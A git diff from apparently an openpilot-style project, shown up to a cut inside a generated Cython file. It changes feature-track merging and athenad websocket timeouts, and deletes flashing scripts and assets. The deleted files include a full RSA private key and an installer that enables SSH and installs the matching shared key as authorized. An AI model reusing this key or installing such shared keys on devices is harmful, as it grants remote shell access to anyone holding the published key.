+++ b/rednose/templates/feature_handler.c @@ -0,0 +1,56 @@ +bool sane(double track [K + 1][5]) { + double diffs_x [K-1]; + double diffs_y [K-1]; + int i; + for (i = 0; i < K-1; i++) { + diffs_x[i] = fabs(track[i+2][2] - track[i+1][2]); + diffs_y[i] = fabs(track[i+2][3] - track[i+1][3]); + } + for (i = 1; i < K-1; i++) { + if (((diffs_x[i] > 0.05 or diffs_x[i-1] > 0.05) and + (diffs_x[i] > 2*diffs_x[i-1] or + diffs_x[i] < .5*diffs_x[i-1])) or + ((diffs_y[i] > 0.05 or diffs_y[i-1] > 0.05) and + (diffs_y[i] > 2*diffs_y[i-1] or + diffs_y[i] < .5*diffs_y[i-1]))){ + return false; + } + } + return true; +} + +void merge_features(double *tracks, double *features, long long *empty_idxs) { + double feature_arr [3000][5]; + memcpy(feature_arr, features, 3000 * 5 * sizeof(double)); + double track_arr [6000][K + 1][5]; + memcpy(track_arr, tracks, (K+1) * 6000 * 5 * sizeof(double)); + int match; + int empty_idx = 0; + int idx; + for (int i = 0; i < 3000; i++) { + match = feature_arr[i][4]; + if (track_arr[match][0][1] == match and track_arr[match][0][2] == 0){ + track_arr[match][0][0] = track_arr[match][0][0] + 1; + track_arr[match][0][1] = feature_arr[i][1]; + track_arr[match][0][2] = 1; + idx = track_arr[match][0][0]; + memcpy(track_arr[match][idx], feature_arr[i], 5 * sizeof(double)); + if (idx == K){ + // label complete + track_arr[match][0][3] = 1; + if (sane(track_arr[match])){ + // label valid + track_arr[match][0][4] = 1; + } + } + } else { + // gen new track with this feature + track_arr[empty_idxs[empty_idx]][0][0] = 1; + track_arr[empty_idxs[empty_idx]][0][1] = feature_arr[i][1]; + track_arr[empty_idxs[empty_idx]][0][2] = 1; + memcpy(track_arr[empty_idxs[empty_idx]][1], feature_arr[i], 5 * sizeof(double)); + empty_idx = empty_idx + 1; + } + } + memcpy(tracks, track_arr, (K+1) * 6000 * 5 * sizeof(double)); +} diff --git a/scripts/panda_flash.sh b/scripts/panda_flash.sh deleted file mode 100755 index 393430021..000000000 --- a/scripts/panda_flash.sh +++ /dev/null @@ -1,6 +0,0 @@ -#!/usr/bin/env sh - -DFU_UTIL="dfu-util" -/data/openpilot/selfdrive/ui/qt/spinner & -python -c "from panda import Panda; Panda().flash('/data/openpilot/panda/board/obj/panda.bin.signed')" -killall spinner & diff --git a/scripts/panda_recovery.sh b/scripts/panda_recovery.sh deleted file mode 100755 index bef77b9a1..000000000 --- a/scripts/panda_recovery.sh +++ /dev/null @@ -1,16 +0,0 @@ -#!/usr/bin/env sh - -DFU_UTIL="dfu-util" - -DEFAULT_FW_FN="/data/openpilot/panda/board/obj/panda.bin.signed" - -/data/openpilot/selfdrive/ui/qt/spinner & -pkill -f boardd -python -c "from panda import Panda; Panda().reset(enter_bootstub=True); Panda().reset(enter_bootloader=True)" || true -sleep 1 -echo "\n\n\nUpdating panda.bin..." -$DFU_UTIL -d 0483:df11 -a 0 -s 0x08004000 -D $DEFAULT_FW_FN -echo "\n\n\nUpdating bootstub.panda.bin..." -$DFU_UTIL -d 0483:df11 -a 0 -s 0x08000000:leave -D /data/openpilot/panda/board/obj/bootstub.panda.bin -sleep 1 -echo -n 1 > /data/params/d/DoReboot diff --git a/scripts/ssh_key/id_rsa b/scripts/ssh_key/id_rsa deleted file mode 100644 index 3f269afe2..000000000 --- a/scripts/ssh_key/id_rsa +++ /dev/null @@ -1,28 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQC+iXXq30Tq+J5N -Kat3KWHCzcmwZ55nGh6WggAqECa5CasBlM9VeROpVu3beA+5h0MibRgbD4DMtVXB -t6gEvZ8nd04E7eLA9LTZyFDZ7SkSOVj4oXOQsT0GnJmKrASW5KslTWqVzTfo2XCt -Z+004ikLxmyFeBO8NOcErW1pa8gFdQDToH9FrA7kgysic/XVESTOoe7XlzRoe/eZ -acEQ+jtnmFd21A4aEADkk00Ahjr0uKaJiLUAPatxs2icIXWpgYtfqqtaKF23wSt6 -1OTu6cAwXbOWr3m+IUSRUO0IRzEIQS3z1jfd1svgzSgSSwZ1Lhj4AoKxIEAIc8qJ -rO4uymCJAgMBAAECggEBAISFevxHGdoL3Z5xkw6oO5SQKO2GxEeVhRzNgmu/HA+q -x8OryqD6O1CWY4037kft6iWxlwiLOdwna2P25ueVM3LxqdQH2KS4DmlCx+kq6FwC -gv063fQPMhC9LpWimvaQSPEC7VUPjQlo4tPY6sTTYBUOh0A1ihRm/x7juKuQCWix -Cq8C/DVnB1X4mGj+W3nJc5TwVJtgJbbiBrq6PWrhvB/3qmkxHRL7dU2SBb2iNRF1 -LLY30dJx/cD73UDKNHrlrsjk3UJc29Mp4/MladKvUkRqNwlYxSuAtJV0nZ3+iFkL -s3adSTHdJpClQer45R51rFDlVsDz2ZBpb/hRNRoGDuECgYEA6A1EixLq7QYOh3cb -Xhyh3W4kpVvA/FPfKH1OMy3ONOD/Y9Oa+M/wthW1wSoRL2n+uuIW5OAhTIvIEivj -6bAZsTT3twrvOrvYu9rx9aln4p8BhyvdjeW4kS7T8FP5ol6LoOt2sTP3T1LOuJPO -uQvOjlKPKIMh3c3RFNWTnGzMPa0CgYEA0jNiPLxP3A2nrX0keKDI+VHuvOY88gdh -0W5BuLMLovOIDk9aQFIbBbMuW1OTjHKv9NK+Lrw+YbCFqOGf1dU/UN5gSyE8lX/Q -FsUGUqUZx574nJZnOIcy3ONOnQLcvHAQToLFAGUd7PWgP3CtHkt9hEv2koUwL4vo -ikTP1u9Gkc0CgYEA2apoWxPZrY963XLKBxNQecYxNbLFaWq67t3rFnKm9E8BAICi -4zUaE5J1tMVi7Vi9iks9Ml9SnNyZRQJKfQ+kaebHXbkyAaPmfv+26rqHKboA0uxA -nDOZVwXX45zBkp6g1sdHxJx8JLoGEnkC9eyvSi0C//tRLx86OhLErXwYcNkCf1it -VMRKrWYoXJTUNo6tRhvodM88UnnIo3u3CALjhgU4uC1RTMHV4ZCGBwiAOb8GozSl -s5YD1E1iKwEULloHnK6BIh6P5v8q7J6uf/xdqoKMjlWBHgq6/roxKvkSPA1DOZ3l -jTadcgKFnRUmc+JT9p/ZbCxkA/ALFg8++G+0ghECgYA8vG3M/utweLvq4RI7l7U7 -b+i2BajfK2OmzNi/xugfeLjY6k2tfQGRuv6ppTjehtji2uvgDWkgjJUgPfZpir3I -RsVMUiFgloWGHETOy0Qvc5AwtqTJFLTD1Wza2uBilSVIEsg6Y83Gickh+ejOmEsY -6co17RFaAZHwGfCFFjO76Q== ------END RSA PRIVATE KEY----- diff --git a/scripts/ssh_key/setup_keys b/scripts/ssh_key/setup_keys deleted file mode 100644 index 52a3cabb4..000000000 --- a/scripts/ssh_key/setup_keys +++ /dev/null @@ -1 +0,0 @@ -from="10.0.0.0/8,172.16.0.0/12,192.168.0.0/16" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+iXXq30Tq+J5NKat3KWHCzcmwZ55nGh6WggAqECa5CasBlM9VeROpVu3beA+5h0MibRgbD4DMtVXBt6gEvZ8nd04E7eLA9LTZyFDZ7SkSOVj4oXOQsT0GnJmKrASW5KslTWqVzTfo2XCtZ+004ikLxmyFeBO8NOcErW1pa8gFdQDToH9FrA7kgysic/XVESTOoe7XlzRoe/eZacEQ+jtnmFd21A4aEADkk00Ahjr0uKaJiLUAPatxs2icIXWpgYtfqqtaKF23wSt61OTu6cAwXbOWr3m+IUSRUO0IRzEIQS3z1jfd1svgzSgSSwZ1Lhj4AoKxIEAIc8qJrO4uymCJ public diff --git a/scripts/sshkey_installer.py b/scripts/sshkey_installer.py deleted file mode 100755 index 1413cd8da..000000000 --- a/scripts/sshkey_installer.py +++ /dev/null @@ -1,18 +0,0 @@ -#!/usr/bin/env python3 -import os - -if __name__ == "__main__": - install_key = False - if os.path.isfile("/EON"): - os.system("setprop persist.neos.ssh 1") - os.system("echo -n 1 > /data/params/d/SshEnabled") - if not os.path.isfile("/data/params/d/GithubSshKeys"): - install_key = True - else: - with open('/data/params/d/GithubSshKeys') as f: - if f.read().strip() == "": - install_key = True - - if install_key: - os.system("echo -n openpilot > /data/params/d/GithubUsername") - os.system("cp /data/openpilot/scripts/ssh_key/setup_keys /data/params/d/GithubSshKeys") diff --git a/selfdrive/assets/images/triangle.svg b/selfdrive/assets/images/triangle.svg index 39bc56c69..9320269bd 100644 --- a/selfdrive/assets/images/triangle.svg +++ b/selfdrive/assets/images/triangle.svg @@ -21,12 +21,12 @@ rdf:about=""> image/svg+xml + rdf:resource="http://purl.org/dc/dcmitype/StillImage" /> + id="defs6" /> diff --git a/selfdrive/assets/img_turn_left_icon.png b/selfdrive/assets/img_turn_left_icon.png deleted file mode 100644 index 1a5ef61d7..000000000 Binary files a/selfdrive/assets/img_turn_left_icon.png and /dev/null differ diff --git a/selfdrive/assets/img_turn_right_icon.png b/selfdrive/assets/img_turn_right_icon.png deleted file mode 100644 index d53e78a4c..000000000 Binary files a/selfdrive/assets/img_turn_right_icon.png and /dev/null differ diff --git a/selfdrive/assets/img_world_icon.png b/selfdrive/assets/img_world_icon.png deleted file mode 100644 index fcfc9d95d..000000000 Binary files a/selfdrive/assets/img_world_icon.png and /dev/null differ diff --git a/selfdrive/assets/locales/ja-JP/LC_MESSAGES/events.mo b/selfdrive/assets/locales/ja-JP/LC_MESSAGES/events.mo deleted file mode 100644 index 117720252..000000000 Binary files a/selfdrive/assets/locales/ja-JP/LC_MESSAGES/events.mo and /dev/null differ diff --git a/selfdrive/assets/locales/ko-KR/LC_MESSAGES/events.mo b/selfdrive/assets/locales/ko-KR/LC_MESSAGES/events.mo deleted file mode 100644 index 4ade26d3f..000000000 Binary files a/selfdrive/assets/locales/ko-KR/LC_MESSAGES/events.mo and /dev/null differ diff --git a/selfdrive/assets/locales/zh-CN/LC_MESSAGES/events.mo b/selfdrive/assets/locales/zh-CN/LC_MESSAGES/events.mo deleted file mode 100644 index 27f3cf194..000000000 Binary files a/selfdrive/assets/locales/zh-CN/LC_MESSAGES/events.mo and /dev/null differ diff --git a/selfdrive/assets/locales/zh-TW/LC_MESSAGES/events.mo b/selfdrive/assets/locales/zh-TW/LC_MESSAGES/events.mo deleted file mode 100644 index ce843f945..000000000 Binary files a/selfdrive/assets/locales/zh-TW/LC_MESSAGES/events.mo and /dev/null differ diff --git a/selfdrive/assets/sounds/rec_off.wav b/selfdrive/assets/sounds/rec_off.wav deleted file mode 100644 index 4bed79ac1..000000000 Binary files a/selfdrive/assets/sounds/rec_off.wav and /dev/null differ diff --git a/selfdrive/assets/sounds/rec_on.wav b/selfdrive/assets/sounds/rec_on.wav deleted file mode 100644 index 0990308ed..000000000 Binary files a/selfdrive/assets/sounds/rec_on.wav and /dev/null differ diff --git a/selfdrive/athena/athenad.py b/selfdrive/athena/athenad.py index 842c64967..35a9eaf19 100755 --- a/selfdrive/athena/athenad.py +++ b/selfdrive/athena/athenad.py @@ -42,6 +42,10 @@ from selfdrive.statsd import STATS_DIR from system.swaglog import SWAGLOG_DIR, cloudlog from system.version import get_commit, get_origin, get_short_branch, get_version + +# missing in pysocket +TCP_USER_TIMEOUT = 18 + ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai') HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4")) LOCAL_PORT_WHITELIST = {8022} @@ -137,10 +141,11 @@ class UploadQueueCache: cloudlog.exception("athena.UploadQueueCache.cache.exception") -def handle_long_poll(ws: WebSocket) -> None: +def handle_long_poll(ws: WebSocket, exit_event: Optional[threading.Event]) -> None: end_event = threading.Event() threads = [ + threading.Thread(target=ws_manage, args=(ws, end_event), name='ws_manage'), threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'), threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'), threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'), @@ -154,8 +159,9 @@ def handle_long_poll(ws: WebSocket) -> None: for thread in threads: thread.start() try: - while not end_event.is_set(): - time.sleep(0.1) + while not end_event.wait(0.1): + if exit_event is not None and exit_event.is_set(): + end_event.set() except (KeyboardInterrupt, SystemExit): end_event.set() raise @@ -754,11 +760,30 @@ def ws_send(ws: WebSocket, end_event: threading.Event) -> None: end_event.set() +def ws_manage(ws: WebSocket, end_event: threading.Event) -> None: + params = Params() + onroad_prev = None + sock = ws.sock + + while True: + onroad = params.get_bool("IsOnroad") + if onroad != onroad_prev: + onroad_prev = onroad + + sock.setsockopt(socket.IPPROTO_TCP, TCP_USER_TIMEOUT, 16000 if onroad else 0) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 7 if onroad else 30) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 7 if onroad else 10) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 2 if onroad else 3) + + if end_event.wait(5): + break + + def backoff(retries: int) -> int: return random.randrange(0, min(128, int(2 ** retries))) -def main(): +def main(exit_event: Optional[threading.Event] = None): try: set_core_affinity([0, 1, 2, 3]) except Exception: @@ -771,26 +796,34 @@ def main(): ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id api = Api(dongle_id) + conn_start = None conn_retries = 0 - while 1: + while exit_event is None or not exit_event.is_set(): try: - cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri) + if conn_start is None: + conn_start = time.monotonic() + + cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri, retries=conn_retries) ws = create_connection(ws_uri, cookie="jwt=" + api.get_token(), enable_multithread=True, timeout=30.0) - cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri) + cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri, retries=conn_retries, + duration=time.monotonic() - conn_start) + conn_start = None conn_retries = 0 cur_upload_items.clear() - handle_long_poll(ws) + handle_long_poll(ws, exit_event) except (KeyboardInterrupt, SystemExit): break except (ConnectionError, TimeoutError, WebSocketException): conn_retries += 1 params.remove("LastAthenaPingTime") - except socket.timeout: + # TODO: socket.timeout and TimeoutError are now the same exception since python3.10 + # Remove the socket.timeout case once we have fully moved to python3.11 + except socket.timeout: # pylint: disable=duplicate-except params.remove("LastAthenaPingTime") except Exception: cloudlog.exception("athenad.main.exception") diff --git a/selfdrive/athena/registration.py b/selfdrive/athena/registration.py index 309add908..32bc92059 100755 --- a/selfdrive/athena/registration.py +++ b/selfdrive/athena/registration.py @@ -31,8 +31,7 @@ def register(show_spinner=False) -> Optional[str]: HardwareSerial = params.get("HardwareSerial", encoding='utf8') dongle_id: Optional[str] = params.get("DongleId", encoding='utf8') needs_registration = None in (IMEI, HardwareSerial, dongle_id) - return UNREGISTERED_DONGLE_ID - + pubkey = Path(PERSIST+"/comma/id_rsa.pub") if not pubkey.is_file(): dongle_id = UNREGISTERED_DONGLE_ID diff --git a/selfdrive/boardd/boardd b/selfdrive/boardd/boardd index 22c1a067d..41e3def3b 100755 Binary files a/selfdrive/boardd/boardd and b/selfdrive/boardd/boardd differ diff --git a/selfdrive/boardd/boardd_api_impl.cpp b/selfdrive/boardd/boardd_api_impl.cpp new file mode 100644 index 000000000..3a2330de4 --- /dev/null +++ b/selfdrive/boardd/boardd_api_impl.cpp @@ -0,0 +1,6373 @@ +/* Generated by Cython 3.0.0 */ + +/* BEGIN: Cython Metadata +{ + "distutils": { + "depends": [ + "selfdrive/boardd/can_list_to_can_capnp.cc", + "selfdrive/boardd/panda.h" + ], + "include_dirs": [ + "selfdrive/boardd" + ], + "language": "c++", + "name": "selfdrive.boardd.boardd_api_impl", + "sources": [ + "/data/openpilot/selfdrive/boardd/boardd_api_impl.pyx" + ] + }, + "module_name": "selfdrive.boardd.boardd_api_impl" +} +END: Cython Metadata */ + +#ifndef PY_SSIZE_T_CLEAN +#define PY_SSIZE_T_CLEAN +#endif /* PY_SSIZE_T_CLEAN */ +#if defined(CYTHON_LIMITED_API) && 0 + #ifndef Py_LIMITED_API + #if CYTHON_LIMITED_API+0 > 0x03030000 + #define Py_LIMITED_API CYTHON_LIMITED_API + #else + #define Py_LIMITED_API 0x03030000 + #endif + #endif +#endif + +#include "Python.h" +#ifndef Py_PYTHON_H + #error Python headers needed to compile C extensions, please install development version of Python. +#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) + #error Cython requires Python 2.7+ or Python 3.3+. +#else +#define CYTHON_ABI "3_0_0" +#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI +#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." +#define CYTHON_HEX_VERSION 0x030000F0 +#define CYTHON_FUTURE_DIVISION 1 +#include +#ifndef offsetof + #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) +#endif +#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) + #ifndef __stdcall + #define __stdcall + #endif + #ifndef __cdecl + #define __cdecl + #endif + #ifndef __fastcall + #define __fastcall + #endif +#endif +#ifndef DL_IMPORT + #define DL_IMPORT(t) t +#endif +#ifndef DL_EXPORT + #define DL_EXPORT(t) t +#endif +#define __PYX_COMMA , +#ifndef HAVE_LONG_LONG + #define HAVE_LONG_LONG +#endif +#ifndef PY_LONG_LONG + #define PY_LONG_LONG LONG_LONG +#endif +#ifndef Py_HUGE_VAL + #define Py_HUGE_VAL HUGE_VAL +#endif +#if defined(GRAALVM_PYTHON) + /* For very preliminary testing purposes. Most variables are set the same as PyPy. + The existence of this section does not imply that anything works or is even tested */ + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 1 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PYPY_VERSION) + #define CYTHON_COMPILING_IN_PYPY 1 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #if PY_VERSION_HEX < 0x03090000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(CYTHON_LIMITED_API) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 1 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_CLINE_IN_TRACEBACK + #define CYTHON_CLINE_IN_TRACEBACK 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 1 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #endif + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 1 + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PY_NOGIL) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 1 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #ifndef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 +#else + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 1 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #ifndef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #endif + #ifndef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 1 + #endif + #if PY_MAJOR_VERSION < 3 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #ifndef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 1 + #endif + #ifndef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 1 + #endif + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #elif !defined(CYTHON_USE_UNICODE_WRITER) + #define CYTHON_USE_UNICODE_WRITER 1 + #endif + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #ifndef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 1 + #endif + #ifndef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) + 